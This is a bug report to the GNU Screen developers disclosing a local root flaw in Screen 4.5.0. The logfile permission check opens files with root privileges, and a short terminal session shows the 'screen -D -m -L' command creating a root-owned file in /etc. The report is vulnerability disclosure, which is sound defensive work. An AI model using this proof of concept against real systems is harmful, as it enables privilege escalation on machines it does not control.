[screen-devel] [bug #50142] root exploit 4.5.0

From: anonymous Subject: [screen-devel] [bug #50142] root exploit 4.5.0 Date: Tue, 24 Jan 2017 19:05:10 +0000 (UTC) User-agent: Mozilla/5.0 (X11; Ubuntu; Linux x86_64; rv:50.0) Gecko/20100101 Firefox/50.0

URL: <http://savannah.gnu.org/bugs/?50142> Summary: root exploit 4.5.0 Project: GNU Screen Submitted by: None Submitted on: Tue 24 Jan 2017 07:05:09 PM UTC Category: Program Logic Severity: 3 - Normal Priority: 5 - Normal Status: None Privacy: Private Assigned to: None Open/Closed: Open Discussion Lock: Any Release: None Fixed Release: None Planned Release: None Work Required: None _______________________________________________________ Details: Commit f86a374 ("screen.c: adding permissions check for the logfile name", 2015-11-04) The check opens the logfile with full root privileges. This allows us to truncate any file or create a root-owned file with any contents in any directory and can be easily exploited to full root access in several ways. > address@hidden:~$ screen --version > Screen version 4.05.00 (GNU) 10-Dec-16 > address@hidden:~$ id > uid=125(buczek) gid=125(buczek) groups=125(buczek),15(users),19(adm),42(admin),154(Omp3grp),200(algrgrp),209(cdgrp),242(gridgrp),328(nchemgrp),407(hoeheweb),446(spwgrp),453(helpdesk),512(twikigrp),584(zmgrp),598(edv),643(megamgrp),677(greedgrp),5000(abt_srv),16003(framesgr),16012(chrigrp),17001(priv_cpw) > address@hidden:~$ cd /etc > address@hidden:/etc (master)$ screen -D -m -L bla.bla echo fail > address@hidden:/etc (master)$ ls -l bla.bla > -rw-rw---- 1 root buczek 6 Jan 24 19:58 bla.bla > address@hidden:/etc (master)$ cat bla.bla > fail > address@hidden:/etc (master)$ Donald Buczek <address@hidden> _______________________________________________________ Reply to this item at: <http://savannah.gnu.org/bugs/?50142> _______________________________________________ Message sent via/by Savannah http://savannah.gnu.org/

reply via email to

